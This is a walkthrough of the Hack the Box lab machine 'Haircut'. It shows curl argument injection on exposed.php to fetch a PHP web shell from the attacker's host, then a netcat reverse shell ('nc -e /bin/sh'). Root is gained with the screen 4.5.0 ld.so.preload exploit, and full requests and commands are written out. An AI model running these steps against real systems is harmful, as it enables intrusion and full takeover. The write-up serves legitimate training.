Hack the Box – Haircut Walkthrough

Today we’re going to solve another CTF machine “Haircut”. It is now retired box and can be accessible if you’re a VIP member.

Introduction

Specifications

  • Target OS: Linux
  • Services: SSH, HTTP
  • IP Address: 10.10.10.24
  • Difficulty: Easy

Weakness

  • Curl Command
  • SUID Screen 4.5

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

We just found these two ports opened after doing intense scan for TCP and UDP port scanning. So what do we next is enumerate running services.

Enumerate Directories

There’s different tools for directories enumerating but my favorite one is dirbuster.

Using lowercase medium wordlist we found and exposed.php file and upload directory.

Let’s take a look at exposed.php file.

There’s a input field where you can enter URL and press go let’s take a look what it dose.

Let’s take a look at the request and response in burp suite.

Request

POST /exposed.php HTTP/1.1 Host: 10.10.10.24 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.10.10.24/exposed.php DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 52 formurl=http://localhost/test.html&submit=Go

Response

HTTP/1.1 200 OK Server: nginx/1.10.0 (Ubuntu) Date: Thu, 29 Nov 2018 19:05:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 1011 Hairdresser checker

Enter the Hairdresser’s location you would like to check. Example: http://localhost/test.html

Requesting Site…

% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:–:-- --:–:-- --:–:-- 0 100 223 100 223 0 0 167k 0 --:–:-- --:–:-- --:–:-- 217k

I know that it is running curl command because of the structure of the response. But it also hints about curl inside carrie,jpg picture where it says CARRIE CURL.

We know what curl can do

Exploitation

We can use curl to upload our shell inside uploads directory which we found during enumerating directories.

Let’s create a php reverse shell 1337.php

1337.php

Now we have to run python HTTP server to upload our 1337.php file through curl.

python -m SimpleHTTPServer

Now we have to upload our shell inside upload directory. Since we know the default apache path /var/www/html/uploads let’s use curl parameter -o to output file 1337.php inside uploads directory.

-o /var/www/html/uploads/1337.php http://10.10.14.4:8000/1337.php

Request

POST /exposed.php HTTP/1.1 Host: 10.10.10.24 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.10.10.24/exposed.php DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 103 formurl=-o /var/www/html/uploads/1337.php http://10.10.14.4:8000/1337.php&submit=Go

Now our php shell is successfully uploaded inside uploads directory.

Let’s access our shell through browser or burp.

Request 1337.php?cmd=ls

GET /uploads/1337.php?cmd=ls HTTP/1.1 Host: 10.10.10.24 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0

Response

HTTP/1.1 200 OK Server: nginx/1.10.0 (Ubuntu) Date: Thu, 29 Nov 2018 20:24:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 31

1337.php bounce.jpg 

Now it’s time to get proper reverse shell using netcat.

GET /uploads/1337.php?cmd=nc -e /bin/sh 10.10.14.4 1337 HTTP/1.1 Host: 10.10.10.24 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0

And we got shell.

Privilege Escalation

After getting user access we move forward by running some scripts which help us to go through some important information which can lead to root.

Before running scripts i do some manual research and testing so this time i found an uncommon SUID file.

The first thing i did is ran this command.

find / -perm -4000 2>/dev/null

And found this uncommon file /usr/bin/screen-4.5.0 which we don’t see here. Upon doing google search we found an exploit.

GCC is broken on target machine so we have to compile them locally.

let’s compile.

gcc -fPIC -shared -ldl -o libhax.so libhax.c

Let’s upload compiled c programs to our targeted machine inside /tmp.

Let’s move further.

www-data@haircut:/tmp$ cd /etc cd /etc www-data@haircut:/etc$ ls -la |grep ld ls -la |grep ld -rw-r–r-- 1 root root 24939 May 19 2017 ld.so.cache -rw-r–r-- 1 root root 34 Jan 27 2016 ld.so.conf drwxr-xr-x 2 root root 4096 May 16 2017 ld.so.conf.d drwxr-xr-x 2 root root 4096 May 15 2017 ldap

www-data@haircut:/etc$ umask 000 umask 000 www-data@haircut:/etc$ screen -D -m -L ld.so.preload echo -ne “\x0a/tmp/libhax.so” <en -D -m -L ld.so.preload echo -ne “\x0a/tmp/libhax.so” www-data@haircut:/etc$ screen -ls screen -ls ’ from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. [+] done! No Sockets found in /tmp/screens/S-www-data. www-data@haircut:/etc$ /tmp/rootshell /tmp/rootshell # id id uid=0(root) gid=0(root) groups=0(root),33(www-data)